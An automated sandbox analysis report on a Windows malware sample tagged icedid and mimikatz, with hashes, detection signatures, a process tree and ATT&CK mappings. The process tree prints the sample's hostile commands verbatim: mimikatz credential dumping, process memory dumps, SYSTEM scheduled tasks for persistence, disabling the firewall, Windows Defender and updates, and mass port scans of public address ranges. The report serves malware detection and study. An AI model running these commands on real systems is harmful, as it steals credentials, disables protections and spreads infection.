Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    20-04-2024 08:36

General

  • Target

    2024-04-20_b794331c620328893be7a741da60dda6_hacktools_icedid_mimikatz.exe

  • Size

    7.1MB

  • MD5

    b794331c620328893be7a741da60dda6

  • SHA1

    0f840b90f3bd94d178ddc3db5c15829e3d57f63c

  • SHA256

    aa1c96957127fe111ab4453e1a6d1dfd6c98299f176123b05a6dd0a777b4594a

  • SHA512

    090d8cf23b51f7bde604575d12cb46eac2101d301047b2b8e9d3df0c89378c23a94d96f34e0740a20c737377f49fa9ee26bfaee421a2cf001ee6c8acdd50e6c0

  • SSDEEP

    196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1

Malware Config

Signatures

  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Contacts a large (26220) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Detects executables containing SQL queries to confidential data stores. Observed in infostealers 3 IoCs
  • UPX dump on OEP (original entry point) 16 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 6 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Sets file execution options in registry 2 TTPs 40 IoCs
  • Executes dropped EXE 16 IoCs
  • Loads dropped DLL 22 IoCs
  • UPX packed file 13 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Creates a Windows Service
  • Drops file in System32 directory 12 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • NSIS installer 3 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 14 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 31 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:1040
      • C:\Windows\TEMP\abyrlhezn\yzhesb.exe
        "C:\Windows\TEMP\abyrlhezn\yzhesb.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:836
    • C:\Users\Admin\AppData\Local\Temp\2024-04-20_b794331c620328893be7a741da60dda6_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-04-20_b794331c620328893be7a741da60dda6_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1644
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\tkeblhan\hbuauda.exe
        2⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1980
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • Runs ping.exe
          PID:2900
        • C:\Windows\tkeblhan\hbuauda.exe
          C:\Windows\tkeblhan\hbuauda.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:2496
    • C:\Windows\tkeblhan\hbuauda.exe
      C:\Windows\tkeblhan\hbuauda.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Sets file execution options in registry
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2636
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2656
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:2504
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
            3⤵
              PID:2280
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
                PID:2412
              • C:\Windows\SysWOW64\cacls.exe
                cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                3⤵
                  PID:2408
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                    PID:2524
                  • C:\Windows\SysWOW64\cacls.exe
                    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                    3⤵
                      PID:2556
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static del all
                    2⤵
                    • Modifies data under HKEY_USERS
                    PID:2404
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add policy name=Bastards description=FuckingBastards
                    2⤵
                    • Modifies data under HKEY_USERS
                    PID:2436
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filteraction name=BastardsList action=block
                    2⤵
                    • Modifies data under HKEY_USERS
                    PID:2116
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c C:\Windows\ybbsclezq\sdgebhger\wpcap.exe /S
                    2⤵
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:2896
                    • C:\Windows\ybbsclezq\sdgebhger\wpcap.exe
                      C:\Windows\ybbsclezq\sdgebhger\wpcap.exe /S
                      3⤵
                      • Drops file in Drivers directory
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Drops file in System32 directory
                      • Drops file in Program Files directory
                      • Suspicious use of WriteProcessMemory
                      PID:2620
                      • C:\Windows\SysWOW64\net.exe
                        net stop "Boundary Meter"
                        4⤵
                          PID:1548
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 stop "Boundary Meter"
                            5⤵
                              PID:1596
                          • C:\Windows\SysWOW64\net.exe
                            net stop "TrueSight Meter"
                            4⤵
                              PID:948
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop "TrueSight Meter"
                                5⤵
                                  PID:1576
                              • C:\Windows\SysWOW64\net.exe
                                net stop npf
                                4⤵
                                  PID:2692
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop npf
                                    5⤵
                                      PID:676
                                  • C:\Windows\SysWOW64\net.exe
                                    net start npf
                                    4⤵
                                      PID:1172
                                      • C:\Windows\SysWOW64\net1.exe
                                        C:\Windows\system32\net1 start npf
                                        5⤵
                                          PID:3056
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c net start npf
                                    2⤵
                                      PID:1828
                                      • C:\Windows\SysWOW64\net.exe
                                        net start npf
                                        3⤵
                                          PID:2220
                                          • C:\Windows\SysWOW64\net1.exe
                                            C:\Windows\system32\net1 start npf
                                            4⤵
                                              PID:2212
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /c net start npf
                                          2⤵
                                            PID:2204
                                            • C:\Windows\SysWOW64\net.exe
                                              net start npf
                                              3⤵
                                                PID:1616
                                                • C:\Windows\SysWOW64\net1.exe
                                                  C:\Windows\system32\net1 start npf
                                                  4⤵
                                                    PID:2140
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c C:\Windows\ybbsclezq\sdgebhger\zkyetylab.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ybbsclezq\sdgebhger\Scant.txt
                                                2⤵
                                                • Loads dropped DLL
                                                PID:1296
                                                • C:\Windows\ybbsclezq\sdgebhger\zkyetylab.exe
                                                  C:\Windows\ybbsclezq\sdgebhger\zkyetylab.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ybbsclezq\sdgebhger\Scant.txt
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  PID:568
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c C:\Windows\ybbsclezq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\ybbsclezq\Corporate\log.txt
                                                2⤵
                                                • Loads dropped DLL
                                                • Drops file in Windows directory
                                                PID:1460
                                                • C:\Windows\ybbsclezq\Corporate\vfshost.exe
                                                  C:\Windows\ybbsclezq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2852
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "zqsuqyaue" /ru system /tr "cmd /c C:\Windows\ime\hbuauda.exe"
                                                2⤵
                                                  PID:1784
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                    3⤵
                                                      PID:1724
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /create /sc minute /mo 1 /tn "zqsuqyaue" /ru system /tr "cmd /c C:\Windows\ime\hbuauda.exe"
                                                      3⤵
                                                      • Creates scheduled task(s)
                                                      PID:2152
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ykuanabgb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tkeblhan\hbuauda.exe /p everyone:F"
                                                    2⤵
                                                      PID:2872
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                        3⤵
                                                          PID:1840
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          schtasks /create /sc minute /mo 1 /tn "ykuanabgb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tkeblhan\hbuauda.exe /p everyone:F"
                                                          3⤵
                                                          • Creates scheduled task(s)
                                                          PID:1664
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "nlqbsllsb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\abyrlhezn\yzhesb.exe /p everyone:F"
                                                        2⤵
                                                          PID:1740
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                            3⤵
                                                              PID:1640
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              schtasks /create /sc minute /mo 1 /tn "nlqbsllsb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\abyrlhezn\yzhesb.exe /p everyone:F"
                                                              3⤵
                                                              • Creates scheduled task(s)
                                                              PID:556
                                                          • C:\Windows\SysWOW64\netsh.exe
                                                            netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                                                            2⤵
                                                              PID:756
                                                            • C:\Windows\SysWOW64\netsh.exe
                                                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                                                              2⤵
                                                                PID:2816
                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                2⤵
                                                                  PID:1528
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh ipsec static set policy name=Bastards assign=y
                                                                  2⤵
                                                                  • Modifies data under HKEY_USERS
                                                                  PID:2528
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                                                                  2⤵
                                                                  • Modifies data under HKEY_USERS
                                                                  PID:2824
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                                                                  2⤵
                                                                  • Modifies data under HKEY_USERS
                                                                  PID:2548
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                  2⤵
                                                                  • Modifies data under HKEY_USERS
                                                                  PID:2552
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh ipsec static set policy name=Bastards assign=y
                                                                  2⤵
                                                                    PID:2384
                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                                                                    2⤵
                                                                      PID:2416
                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                                                                      2⤵
                                                                        PID:2444
                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                        netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                        2⤵
                                                                        • Modifies data under HKEY_USERS
                                                                        PID:1496
                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                        netsh ipsec static set policy name=Bastards assign=y
                                                                        2⤵
                                                                        • Modifies data under HKEY_USERS
                                                                        PID:2772
                                                                      • C:\Windows\TEMP\ybbsclezq\rdglllqba.exe
                                                                        C:\Windows\TEMP\ybbsclezq\rdglllqba.exe -accepteula -mp 1040 C:\Windows\TEMP\ybbsclezq\1040.dmp
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        • Modifies data under HKEY_USERS
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:348
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd /c net stop SharedAccess
                                                                        2⤵
                                                                          PID:2124
                                                                          • C:\Windows\SysWOW64\net.exe
                                                                            net stop SharedAccess
                                                                            3⤵
                                                                              PID:1480
                                                                              • C:\Windows\SysWOW64\net1.exe
                                                                                C:\Windows\system32\net1 stop SharedAccess
                                                                                4⤵
                                                                                  PID:2960
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd /c netsh firewall set opmode mode=disable
                                                                              2⤵
                                                                                PID:1596
                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                  netsh firewall set opmode mode=disable
                                                                                  3⤵
                                                                                  • Modifies Windows Firewall
                                                                                  PID:1576
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd /c netsh Advfirewall set allprofiles state off
                                                                                2⤵
                                                                                  PID:2708
                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                    netsh Advfirewall set allprofiles state off
                                                                                    3⤵
                                                                                    • Modifies Windows Firewall
                                                                                    • Modifies data under HKEY_USERS
                                                                                    PID:1904
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd /c net stop MpsSvc
                                                                                  2⤵
                                                                                    PID:2064
                                                                                    • C:\Windows\SysWOW64\net.exe
                                                                                      net stop MpsSvc
                                                                                      3⤵
                                                                                        PID:2068
                                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                                          C:\Windows\system32\net1 stop MpsSvc
                                                                                          4⤵
                                                                                            PID:828
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        cmd /c net stop WinDefend
                                                                                        2⤵
                                                                                          PID:2240
                                                                                          • C:\Windows\SysWOW64\net.exe
                                                                                            net stop WinDefend
                                                                                            3⤵
                                                                                              PID:2944
                                                                                              • C:\Windows\SysWOW64\net1.exe
                                                                                                C:\Windows\system32\net1 stop WinDefend
                                                                                                4⤵
                                                                                                  PID:1072
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              cmd /c net stop wuauserv
                                                                                              2⤵
                                                                                                PID:1168
                                                                                                • C:\Windows\SysWOW64\net.exe
                                                                                                  net stop wuauserv
                                                                                                  3⤵
                                                                                                    PID:592
                                                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                                                      C:\Windows\system32\net1 stop wuauserv
                                                                                                      4⤵
                                                                                                        PID:2340
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    cmd /c sc config MpsSvc start= disabled
                                                                                                    2⤵
                                                                                                      PID:1560
                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                        sc config MpsSvc start= disabled
                                                                                                        3⤵
                                                                                                        • Launches sc.exe
                                                                                                        PID:1404
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd /c sc config SharedAccess start= disabled
                                                                                                      2⤵
                                                                                                        PID:1348
                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                          sc config SharedAccess start= disabled
                                                                                                          3⤵
                                                                                                          • Launches sc.exe
                                                                                                          PID:640
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        cmd /c sc config WinDefend start= disabled
                                                                                                        2⤵
                                                                                                          PID:2620
                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                            sc config WinDefend start= disabled
                                                                                                            3⤵
                                                                                                            • Launches sc.exe
                                                                                                            PID:1732
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          cmd /c sc config wuauserv start= disabled
                                                                                                          2⤵
                                                                                                            PID:2904
                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                              sc config wuauserv start= disabled
                                                                                                              3⤵
                                                                                                              • Launches sc.exe
                                                                                                              PID:1296
                                                                                                          • C:\Windows\TEMP\xohudmc.exe
                                                                                                            C:\Windows\TEMP\xohudmc.exe
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Drops file in System32 directory
                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                            PID:2912
                                                                                                          • C:\Windows\TEMP\ybbsclezq\rdglllqba.exe
                                                                                                            C:\Windows\TEMP\ybbsclezq\rdglllqba.exe -accepteula -mp 1056 C:\Windows\TEMP\ybbsclezq\1056.dmp
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:1692
                                                                                                          • C:\Windows\TEMP\ybbsclezq\rdglllqba.exe
                                                                                                            C:\Windows\TEMP\ybbsclezq\rdglllqba.exe -accepteula -mp 1132 C:\Windows\TEMP\ybbsclezq\1132.dmp
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Modifies data under HKEY_USERS
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:1276
                                                                                                          • C:\Windows\TEMP\ybbsclezq\rdglllqba.exe
                                                                                                            C:\Windows\TEMP\ybbsclezq\rdglllqba.exe -accepteula -mp 3000 C:\Windows\TEMP\ybbsclezq\3000.dmp
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:1520
                                                                                                          • C:\Windows\TEMP\ybbsclezq\rdglllqba.exe
                                                                                                            C:\Windows\TEMP\ybbsclezq\rdglllqba.exe -accepteula -mp 1360 C:\Windows\TEMP\ybbsclezq\1360.dmp
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:1924
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            cmd.exe /c C:\Windows\ybbsclezq\sdgebhger\scan.bat
                                                                                                            2⤵
                                                                                                            • Loads dropped DLL
                                                                                                            PID:1984
                                                                                                            • C:\Windows\ybbsclezq\sdgebhger\yrbrnhula.exe
                                                                                                              yrbrnhula.exe TCP 191.101.0.1 191.101.255.255 445 512 /save
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Drops file in Windows directory
                                                                                                              PID:2888
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                                            2⤵
                                                                                                              PID:2780
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                3⤵
                                                                                                                  PID:1400
                                                                                                                • C:\Windows\SysWOW64\cacls.exe
                                                                                                                  cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                                                                                                  3⤵
                                                                                                                    PID:2684
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                    3⤵
                                                                                                                      PID:2712
                                                                                                                    • C:\Windows\SysWOW64\cacls.exe
                                                                                                                      cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                                                                                                      3⤵
                                                                                                                        PID:1316
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                        3⤵
                                                                                                                          PID:2168
                                                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                                                          cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                                                          3⤵
                                                                                                                            PID:2896
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
                                                                                                                        1⤵
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:1856
                                                                                                                      • C:\Windows\SysWOW64\vifzsk.exe
                                                                                                                        C:\Windows\SysWOW64\vifzsk.exe
                                                                                                                        1⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                        PID:1660
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                                                                                                                        1⤵
                                                                                                                          PID:1700
                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                          C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                                                                                                                          1⤵
                                                                                                                            PID:2604
                                                                                                                          • C:\Windows\system32\taskeng.exe
                                                                                                                            taskeng.exe {99EB258B-0B46-4300-94CB-8B90E91F561B} S-1-5-18:NT AUTHORITY\System:Service:
                                                                                                                            1⤵
                                                                                                                              PID:2176
                                                                                                                              • C:\Windows\system32\cmd.EXE
                                                                                                                                C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\tkeblhan\hbuauda.exe /p everyone:F
                                                                                                                                2⤵
                                                                                                                                  PID:2652
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                    3⤵
                                                                                                                                      PID:2452
                                                                                                                                    • C:\Windows\system32\cacls.exe
                                                                                                                                      cacls C:\Windows\tkeblhan\hbuauda.exe /p everyone:F
                                                                                                                                      3⤵
                                                                                                                                        PID:1020
                                                                                                                                    • C:\Windows\system32\cmd.EXE
                                                                                                                                      C:\Windows\system32\cmd.EXE /c C:\Windows\ime\hbuauda.exe
                                                                                                                                      2⤵
                                                                                                                                        PID:1016
                                                                                                                                        • C:\Windows\ime\hbuauda.exe
                                                                                                                                          C:\Windows\ime\hbuauda.exe
                                                                                                                                          3⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                          PID:2984
                                                                                                                                      • C:\Windows\system32\cmd.EXE
                                                                                                                                        C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\abyrlhezn\yzhesb.exe /p everyone:F
                                                                                                                                        2⤵
                                                                                                                                          PID:2432
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                            3⤵
                                                                                                                                              PID:2348
                                                                                                                                            • C:\Windows\system32\cacls.exe
                                                                                                                                              cacls C:\Windows\TEMP\abyrlhezn\yzhesb.exe /p everyone:F
                                                                                                                                              3⤵
                                                                                                                                                PID:1868
                                                                                                                                            • C:\Windows\system32\cmd.EXE
                                                                                                                                              C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\tkeblhan\hbuauda.exe /p everyone:F
                                                                                                                                              2⤵
                                                                                                                                                PID:1188
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                  3⤵
                                                                                                                                                    PID:1560
                                                                                                                                                  • C:\Windows\system32\cacls.exe
                                                                                                                                                    cacls C:\Windows\tkeblhan\hbuauda.exe /p everyone:F
                                                                                                                                                    3⤵
                                                                                                                                                      PID:904
                                                                                                                                                  • C:\Windows\system32\cmd.EXE
                                                                                                                                                    C:\Windows\system32\cmd.EXE /c C:\Windows\ime\hbuauda.exe
                                                                                                                                                    2⤵
                                                                                                                                                      PID:4080
                                                                                                                                                      • C:\Windows\ime\hbuauda.exe
                                                                                                                                                        C:\Windows\ime\hbuauda.exe
                                                                                                                                                        3⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                        PID:296
                                                                                                                                                    • C:\Windows\system32\cmd.EXE
                                                                                                                                                      C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\abyrlhezn\yzhesb.exe /p everyone:F
                                                                                                                                                      2⤵
                                                                                                                                                        PID:2132
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                          3⤵
                                                                                                                                                            PID:3084
                                                                                                                                                          • C:\Windows\system32\cacls.exe
                                                                                                                                                            cacls C:\Windows\TEMP\abyrlhezn\yzhesb.exe /p everyone:F
                                                                                                                                                            3⤵
                                                                                                                                                              PID:2284
                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                          C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                                                                                                                                                          1⤵
                                                                                                                                                            PID:2920

                                                                                                                                                          Network

                                                                                                                                                          MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                          Execution

                                                                                                                                                          Scheduled Task/Job

                                                                                                                                                          1
                                                                                                                                                          T1053

                                                                                                                                                          Persistence

                                                                                                                                                          Create or Modify System Process

                                                                                                                                                          1
                                                                                                                                                          T1543

                                                                                                                                                          Windows Service

                                                                                                                                                          1
                                                                                                                                                          T1543.003

                                                                                                                                                          Boot or Logon Autostart Execution

                                                                                                                                                          1
                                                                                                                                                          T1547

                                                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                                                          1
                                                                                                                                                          T1547.001

                                                                                                                                                          Scheduled Task/Job

                                                                                                                                                          1
                                                                                                                                                          T1053

                                                                                                                                                          Privilege Escalation

                                                                                                                                                          Create or Modify System Process

                                                                                                                                                          1
                                                                                                                                                          T1543

                                                                                                                                                          Windows Service

                                                                                                                                                          1
                                                                                                                                                          T1543.003

                                                                                                                                                          Boot or Logon Autostart Execution

                                                                                                                                                          1
                                                                                                                                                          T1547

                                                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                                                          1
                                                                                                                                                          T1547.001

                                                                                                                                                          Scheduled Task/Job

                                                                                                                                                          1
                                                                                                                                                          T1053

                                                                                                                                                          Defense Evasion

                                                                                                                                                          Impair Defenses

                                                                                                                                                          1
                                                                                                                                                          T1562

                                                                                                                                                          Disable or Modify System Firewall

                                                                                                                                                          1
                                                                                                                                                          T1562.004

                                                                                                                                                          Modify Registry

                                                                                                                                                          2
                                                                                                                                                          T1112

                                                                                                                                                          Subvert Trust Controls

                                                                                                                                                          1
                                                                                                                                                          T1553

                                                                                                                                                          Install Root Certificate

                                                                                                                                                          1
                                                                                                                                                          T1553.004

                                                                                                                                                          Discovery

                                                                                                                                                          Network Service Discovery

                                                                                                                                                          2
                                                                                                                                                          T1046

                                                                                                                                                          Query Registry

                                                                                                                                                          1
                                                                                                                                                          T1012

                                                                                                                                                          System Information Discovery

                                                                                                                                                          1
                                                                                                                                                          T1082

                                                                                                                                                          Remote System Discovery

                                                                                                                                                          1
                                                                                                                                                          T1018

                                                                                                                                                          Replay Monitor

                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                          Downloads

